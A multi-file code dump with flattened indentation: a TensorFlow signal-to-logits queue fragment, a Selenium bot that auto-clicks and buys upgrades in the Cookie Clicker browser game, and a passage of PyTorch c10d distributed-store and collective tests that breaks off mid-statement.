class Signal2LogitsSess:
def __init__(self, sess: tf.Session, model: models.Model):
self.sess = sess
with tf.name_scope("signal_to_logits"):
self.signal_batch = tf.placeholder(
tf.float32, shape=(None, None, 1), name="signal"
)
self.logits = model(
self.signal_batch
) # [batch size, max_time, channels]
def signal2logit_fn(self, signal: np.ndarray) -> concurrent.futures.Future:
assert len(
signal.shape
) == 1, f"Signal should be rank 1, shape: {signal.shape}"
f = concurrent.futures.Future()
logits = self.sess.run(
self.logits,
feed_dict={
self.signal_batch: signal[np.newaxis, :, np.newaxis],
}
)
logits = np.squeeze(logits, axis=0)
f.set_result(logits)
return f
class Signal2LogitQueue:
"""Never Been tested, use at your own risk!
"""
def __init__(
self,
sess: tf.Session,
coord: tf.train.Coordinator,
model,
max_batch_size: int = 10
):
self.sess = sess
self.coord = coord
self.futures = {}
self.tf_inq = tf.PaddingFIFOQueue(
capacity=10,
dtypes=[tf.string, tf.float32, tf.int32],
shapes=[[], [None, 1], []],
)
self.tf_outq = tf.FIFOQueue(
capacity=10,
dtypes=[tf.string, tf.int64, tf.int32],
)
self.inq_name = tf.placeholder(tf.string, shape=[])
self.inq_signal = tf.placeholder(tf.float32, shape=(None, 1))
self.inq_length = tf.placeholder(tf.int32, shape=[])
self.inq_enqueue = self.tf_inq.enqueue([
self.inq_name, self.inq_signal, self.inq_length
])
self.inq_close = self.tf_inq.close()
with tf.name_scope("signal2logits"):
name, signal, signal_len = self.tf_inq.dequeue_up_to(max_batch_size)
logits = model(signal)
enq_op = self.tf_outq.enqueue([name, logits, signal_len])
qr = tf.train.QueueRunner(self.tf_outq, [enq_op] * os.cpu_count())
tf.train.add_queue_runner(qr)
self.out_dequeue = self.tf_outq.dequeue()
self.t = Thread(target=self._start, daemon=True)
self.t.start()
def _start(self):
try:
while True:
for name, logits, signal_len in zip(
*self.sess.run(self.out_dequeue,)
):
name = name.decode("ASCII")
f = self.futures[name]
f.set_result(logits[:signal_len])
del self.futures[name]
except tf.errors.OutOfRangeError:
# Means the underlying queue is closed and we can safely exit
return
except Exception as ex:
self.coord.request_stop(ex)
raise
async def logits(self, signal: np.ndarray, loop=None):
f = concurrent.futures.Future()
name = uuid.uuid4().hex
self.futures[name] = f
self.sess.run(
self.inq_enqueue,
feed_dict={
self.inq_name: name,
                self.inq_signal: signal[:, np.newaxis],
                self.inq_length: signal.shape[0],
},
)
return await asyncio.wrap_future(f, loop=loop)
def stop(self):
self.sess.run(self.inq_close)
self.t.join(timeout=10)
if self.t.is_alive():
raise ValueError("Thread still alive")
|
cookie-clicker-advanced.py
|
from coockieClickerUtils import *
import threading  # used below for the periodic purchase thread
# Navigate to the application home page.
driver.get('https://orteil.dashnet.org/cookieclicker/')
load()
# Wait 2 seconds for the page to finish loading.
time.sleep(2)
# Load a script to speed up clicking.
hackCoockie()
# Accept cookies and choose English as the language.
driver.find_element(By.XPATH, '/html/body/div[1]/div/a[1]').click()
driver.find_element(By.XPATH, '//div[@id="langSelect-EN"]').click()
# Wait 2 seconds for the page to finish loading.
time.sleep(3)
bigCookie = driver.find_element(By.XPATH, '//button[@id="bigCookie"]')
cookieCounter = driver.find_element(By.XPATH, '//div[@id="cookies"]')
goldenCookie = driver.find_element(By.XPATH, '//div[@id="goldenCookie"]')
shimmers = driver.find_element(By.XPATH, '//div[@id="shimmers"]')
# upgradeStore = driver.find_element(By.XPATH, '//div[@id="upgrades"]')
def cookieCount():
text = cookieCounter.text
# print('text:', text)
return text
def buyUpgrades():
upgrades = list()
try:
for i in range(200):
upgrade = driver.find_element(By.XPATH, '//*[@id="upgrade{}"]'.format(i))
upgrades.append(upgrade)
except Exception as e:
pass
upgrades.reverse()
for upgrade in upgrades:
classes = upgrade.get_attribute("class")
if "enabled" in classes:
upgrade.click()
return
def buyBuildings():
for i in range(18, 0, -1):
product = driver.find_element(By.XPATH, '//div[@id="product{}"]'.format(i))
classes = product.get_attribute("class")
if "enabled" in classes:
product.click()
return
def everyMinut():
# while True:
for i in range(5):
time.sleep(120)
save()
buyUpgrades()
buyBuildings()
print(cookieCount())
minutThread = threading.Thread(target=everyMinut)
minutThread.start()
# for i in range(5000):
while minutThread.is_alive():
bigCookie.click()
minutThread.join()
save()
# while True:
# buyUpgrades()
# time.sleep(5)
# Close the browser window.
driver.quit()
|
test_c10d.py
|
import copy
import math
import operator
import os
import random
import signal
import sys
import tempfile
import threading
import time
import traceback
import unittest
from unittest import mock
from contextlib import contextmanager
from datetime import timedelta
from functools import reduce
from itertools import groupby, product
from sys import platform
import numpy
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.multiprocessing as mp
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch._six import string_classes
from torch.nn.parallel import DistributedDataParallel
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_gloo,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
simple_sparse_reduce_tests,
skip_if_win32,
create_device,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
retry_on_connect_failures,
ADDRESS_IN_USE,
CONNECT_TIMEOUT,
TEST_WITH_TSAN,
IS_WINDOWS,
)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
DEFAULT_HOSTNAME = "localhost"
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
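# Hedged worked example (added for illustration): with 4 visible GPUs and
# world_size=2, gpus_for_rank(2) returns [[0, 1], [2, 3]], i.e. rank 0 uses
# GPUs 0-1 and rank 1 uses GPUs 2-3.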
def simple_reduce_tests(rank, world_size):
tests = [
(
c10d.ReduceOp.SUM,
torch.tensor([rank + 1.0]),
torch.tensor([float(world_size * (world_size + 1) / 2)]),
),
(
c10d.ReduceOp.PRODUCT,
torch.tensor([rank + 1.0]),
torch.tensor([float(math.factorial(world_size))]),
),
(
c10d.ReduceOp.MIN,
torch.tensor([rank + 1.0]),
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
torch.tensor([rank + 1.0]),
torch.tensor([world_size]),
),
]
# Generate tests for BAND.
# The bit that is set changes in every iteration to check
# that the output changes accordingly.
for i in range(4):
vin = rank | (1 << i)
vout = 1 << i
tests.append(
(
c10d.ReduceOp.BAND,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for BOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-OR'ed.
for i in range(1, 5):
vin = reduce(operator.or_, [rank * i + j for j in range(i)])
vout = reduce(operator.or_, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for XOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-XOR'ed.
for i in range(1, 5):
vin = reduce(operator.xor, [rank * i + j for j in range(i)])
vout = reduce(operator.xor, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BXOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
return tests
def simple_coalesced_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([rank + 1]), torch.tensor([(rank + 1) ** 2])],
[
torch.tensor([float(world_size * (world_size + 1) / 2)]),
torch.tensor(
[float(world_size * (world_size + 1) * (2 * world_size + 1) / 6)]
),
],
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([rank + 1.0]), torch.tensor([rank + 2.0])],
[
torch.tensor([float(math.factorial(world_size))]),
torch.tensor([float(math.factorial(world_size + 1))]),
],
),
(
c10d.ReduceOp.MIN,
[torch.tensor([rank + x]) for x in [0.0, 1.0]],
[torch.tensor([0.0]), torch.tensor([1.0])],
),
(
c10d.ReduceOp.MAX,
[torch.tensor([rank + x]) for x in [1.0, 2.0]],
[torch.tensor([world_size]), torch.tensor([world_size + 1.0])],
),
]
def simple_multi_input_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([2 * rank + 0.0]), torch.tensor([2 * rank + 1.0])],
torch.tensor([float(world_size * (2 * world_size - 1))]),
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([float(math.factorial(2 * world_size))]),
),
(
c10d.ReduceOp.MIN,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([2 * world_size]),
),
]
class StoreTestBase(object):
def _create_store(self, i):
raise RuntimeError("not implemented")
def _test_set_get(self, fs):
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
fs.add("key3", 2)
fs.set("key2", "value2")
fs.add("key3", 3)
fs.add("key3", 4)
fs.add("key3", 5)
fs.add("key3", 6)
self.assertEqual(fs.num_keys(), self.num_keys_total)
self.assertEqual(b"6", fs.get("key"))
self.assertEqual(b"value0", fs.get("key0"))
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key2"))
self.assertEqual(b"21", fs.get("key3"))
def test_set_get(self):
self._test_set_get(self._create_store())
def test_compare_set(self):
store = self._create_store()
missing_key_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"wrong_old_value", missing_key_result)
store.set("key0", "value0")
self.assertEqual(b"value0", store.get("key0"))
old_value_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"value0", old_value_result)
self.assertEqual(b"value0", store.get("key0"))
new_value_result = store.compare_set("key0", "value0", "new_value0")
self.assertEqual(b"new_value0", new_value_result)
self.assertEqual(b"new_value0", store.get("key0"))
# This is the number of keys used in test_set_get. Adding this as a class
# property instead of hardcoding in the test since some Store
# implementations will have differing number of keys. In the base case,
# there will be 5 keys: key, key0, key1, key2, key3.
@property
def num_keys_total(self):
return 5
class FileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(FileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
def _create_store(self):
store = c10d.FileStore(self.file.name, 1)
store.set_timeout(timedelta(seconds=300))
return store
@skip_if_win32()
class HashStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(HashStoreTest, self).setUp()
def _create_store(self):
store = c10d.HashStore()
store.set_timeout(timedelta(seconds=300))
return store
class PrefixFileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixFileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
self.filestore = c10d.FileStore(self.file.name, 1)
self.prefix = "test_prefix"
self.filestore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.filestore)
def create_tcp_store(addr, world_size=1, wait_for_workers=True):
"""
Creates a TCP store. Retries if the chosen port is already in use.
"""
ports = []
for _ in range(10):
try:
port = common.find_free_port()
ports.append(port)
return c10d.TCPStore(addr, port, world_size, True, wait_for_workers=wait_for_workers)
except RuntimeError as error:
if str(error) == "Address already in use":
continue
raise
raise RuntimeError("Unable to find free port (tried %s)" % ", ".join(ports))
class TCPStoreTest(TestCase, StoreTestBase):
def _create_store(self):
store = create_tcp_store("localhost")
store.set_timeout(timedelta(seconds=300))
return store
def test_address_already_in_use(self):
if sys.platform == "win32":
err_msg_reg = "Only one usage of each socket address*"
else:
err_msg_reg = "^Address already in use$"
with self.assertRaisesRegex(RuntimeError, err_msg_reg):
addr = "localhost"
port = common.find_free_port()
# Use noqa to silence flake8.
# Need to store in an unused variable here to ensure the first
# object is not destroyed before the second object is created.
store1 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
store2 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
# The TCPStore has 6 keys in test_set_get. It contains the 5 keys added by
    # the user and one additional key used to coordinate all the workers.
@property
def num_keys_total(self):
return 6
def _test_numkeys_delkeys(self, fs):
# We start off with one init key in the store to coordinate workers
self.assertEqual(fs.num_keys(), 1)
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
self.assertEqual(fs.num_keys(), 5)
fs.delete_key("key")
self.assertEqual(fs.num_keys(), 4)
fs.set_timeout(timedelta(seconds=2))
with self.assertRaises(RuntimeError):
fs.get("key")
fs.delete_key("key0")
fs.delete_key("key3")
self.assertEqual(fs.num_keys(), 2)
fs.set("key4", "value2")
self.assertEqual(fs.num_keys(), 3)
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key4"))
def test_numkeys_delkeys(self):
self._test_numkeys_delkeys(self._create_store())
def _create_client(self, index, addr, port, world_size, messages):
try:
client_store = dist.TCPStore(addr, port, world_size, timeout=timedelta(seconds=10))
self.assertEqual("value".encode(), client_store.get("key"))
client_store.set(f"new_key{index}", f"new_value{index}")
self.assertEqual(f"next_value{index}".encode(),
client_store.compare_set(f"new_key{index}", f"new_value{index}", f"next_value{index}"))
except Exception:
messages.put('Caught exception: \n{}exiting process with exit code: {}'
.format(traceback.format_exc(), MultiProcessTestCase.TEST_ERROR_EXIT_CODE))
sys.exit(MultiProcessTestCase.TEST_ERROR_EXIT_CODE)
def _multi_worker_helper(self, world_size):
addr = DEFAULT_HOSTNAME
server_store = create_tcp_store(addr, world_size, wait_for_workers=False)
server_store.set("key", "value")
port = server_store.port
messages = mp.Queue()
processes = []
num_proccesses = random.randint(3, 5) if world_size == -1 else world_size
for i in range(num_proccesses):
p = mp.Process(target=self._create_client, args=(i, addr, port, world_size, messages))
processes.append(p)
p.start()
for p in processes:
p.join()
error_message = ""
while not messages.empty():
error_message += messages.get() + "\n"
if any([p.exitcode != 0 for p in processes]):
raise RuntimeError(error_message)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_fixed_world_size(self):
self._multi_worker_helper(5)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_nonfixed_world_size(self):
self._multi_worker_helper(-1)
class PrefixTCPStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixTCPStoreTest, self).setUp()
self.tcpstore = create_tcp_store("localhost")
self.prefix = "test_prefix"
self.tcpstore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.tcpstore)
# The PrefixTCPStore has 6 keys in test_set_get. It contains the 5 keys
    # added by the user and one additional key used to coordinate all the
# workers.
@property
def num_keys_total(self):
return 6
class MyPythonStore(c10d.Store):
def __init__(self):
super(MyPythonStore, self).__init__()
self.store = dict()
def set(self, key, value):
if not isinstance(key, string_classes):
raise AssertionError("Expected set to be called with string key")
if type(value) is not bytes:
raise AssertionError("Expected set to be called with bytes value")
self.store[key] = value
def get(self, key):
value = self.store.get(key, b"")
if type(value) is not bytes:
raise AssertionError("Expected get to return bytes value")
return value
def add(self, key, value):
new = int(self.store.get(key, 0)) + value
self.set(key, bytes(str(new).encode("utf-8")))
return new
class PythonStoreTest(TestCase):
def setUp(self):
super(PythonStoreTest, self).setUp()
def test_set_get(self):
# If we were to inherit from StoreTestBase and try to use
# its test_set_get function, we would exercise the Python
# API directly, instead of going through the C++ trampoline.
# We care about testing the C++ trampoline, so run the
# equivalent of StoreTestBase.test_set_get from C++.
# See `torch/csrc/distributed/c10d/init.cpp` for the definition
# of this test function.
c10d._test_python_store(MyPythonStore())
class RendezvousTest(TestCase):
def test_unknown_handler(self):
with self.assertRaisesRegex(RuntimeError, "^No rendezvous handler"):
c10d.rendezvous("invalid://")
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
def test_common_errors(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
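        # Context manager that temporarily replaces os.environ with `vars`.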
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
@retry_on_connect_failures
def test_nominal(self):
os.environ["WORLD_SIZE"] = "1"
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(common.find_free_port())
# Single rank
os.environ["RANK"] = "0"
gen0 = c10d.rendezvous("env://")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
class RendezvousFileTest(TestCase):
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "path missing"):
gen = c10d.rendezvous("file://?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?rank=0")
next(gen)
def test_nominal(self):
with tempfile.NamedTemporaryFile(delete=False) as file:
url = f'file:///{file.name.replace(os.path.sep, "/")}?world_size=2'
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(2, size0)
gen1 = c10d.rendezvous(url + "&rank=1")
store1, rank1, size1 = next(gen1)
self.assertEqual(1, rank1)
self.assertEqual(2, size1)
# Set value on both stores
store0.set("key0", "value0")
store1.set("key1", "value1")
# Cross check with get
self.assertEqual(b"value0", store1.get("key0"))
self.assertEqual(b"value1", store0.get("key1"))
@skip_if_win32()
class RendezvousTCPTest(TestCase):
def create_tcp_url(self):
addr = "localhost"
port = common.find_free_port()
url = "tcp://%s:%d?world_size=%d" % (addr, port, 1)
return url
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "port number missing"):
gen = c10d.rendezvous("tcp://127.0.0.1?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?rank=0")
next(gen)
@retry_on_connect_failures
def test_nominal(self):
url = self.create_tcp_url()
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
# Set value on the single store
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
@retry_on_connect_failures(connect_errors=(CONNECT_TIMEOUT, ADDRESS_IN_USE))
def test_tcp_store_timeout_set(self):
url = self.create_tcp_url()
test_store_timeout = timedelta(seconds=10)
gen0 = c10d.rendezvous(url + "&rank=0", timeout=test_store_timeout)
store0, rank0, size0 = next(gen0)
        # This should time out in 10s. If the timeout passed into rendezvous
        # was not respected, it would take much longer to time out.
start = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
store0.get("nonexistant key")
end = time.time()
time_diff = end - start
self.assertGreater(test_store_timeout.seconds * 10, time_diff)
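# Verifies that the store timeout passed to init_process_group is honored by
# the default store.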
class TimeoutTest(TestCase):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
@requires_nccl()
@retry_on_connect_failures
def test_default_store_timeout_nccl(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
self._test_default_store_timeout("nccl")
@requires_gloo()
@retry_on_connect_failures
def test_default_store_timeout_gloo(self):
self._test_default_store_timeout("gloo")
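# Collective tests (broadcast, allreduce, scatter, gather, allgather, reduce,
# send/recv, barrier) against the Gloo process group backend.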
@requires_gloo()
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupGlooTest(MultiProcessTestCase):
def setUp(self):
super(ProcessGroupGlooTest, self).setUp()
        # For the Windows platform, Python does not support fork, so use spawn instead.
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def opts(self, threads=2):
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [create_device(interface=LOOPBACK)]
opts._threads = threads
return opts
def test_multi_device_constructor(self):
store = c10d.FileStore(self.file_name, self.world_size)
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [
create_device(interface=LOOPBACK),
create_device(interface=LOOPBACK),
]
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, opts)
# Execute 2x the number of operations to ensure we use every device.
for work in [pg.allreduce(torch.ones(i + 1)) for i in range(4)]:
work.wait()
def test_empty_tensors(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
xs = [torch.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
def test_broadcast_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = -1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t3], opts)
def _test_broadcast_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# Every rank is root once
for i in range(self.world_size):
# Run with 1 input tensor
x = fn(torch.tensor([self.rank]))
broadcast([x], i, 0)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i]), x)
# Run with 2 input tensors
num = 2
for j in range(num):
xs = [
fn(torch.tensor([self.rank * num + 0.0])),
fn(torch.tensor([self.rank * num + 1.0])),
]
broadcast(xs, i, j)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[0])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[1])
# Test overloaded convenience function
x = torch.tensor([self.rank + 1.0])
work = pg.broadcast(x, root=0)
work.wait()
self.assertEqual(torch.tensor([1.0]), x)
def test_broadcast_basics(self):
self._test_broadcast_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_broadcast_basics_cuda(self):
self._test_broadcast_basics(lambda t: t.clone().cuda())
def _test_broadcast_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [
pg.broadcast(inputs[i], root=(i % self.world_size))
for i in range(len(inputs))
]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
torch.tensor([(i * self.world_size) + (i % self.world_size)]),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_broadcast_stress(self):
inputs = [torch.tensor([i * self.world_size + self.rank]) for i in range(1000)]
self._test_broadcast_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_broadcast_stress_cuda(self):
inputs = [
torch.tensor([i * self.world_size + self.rank]).cuda() for i in range(1000)
]
self._test_broadcast_stress(inputs)
def test_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
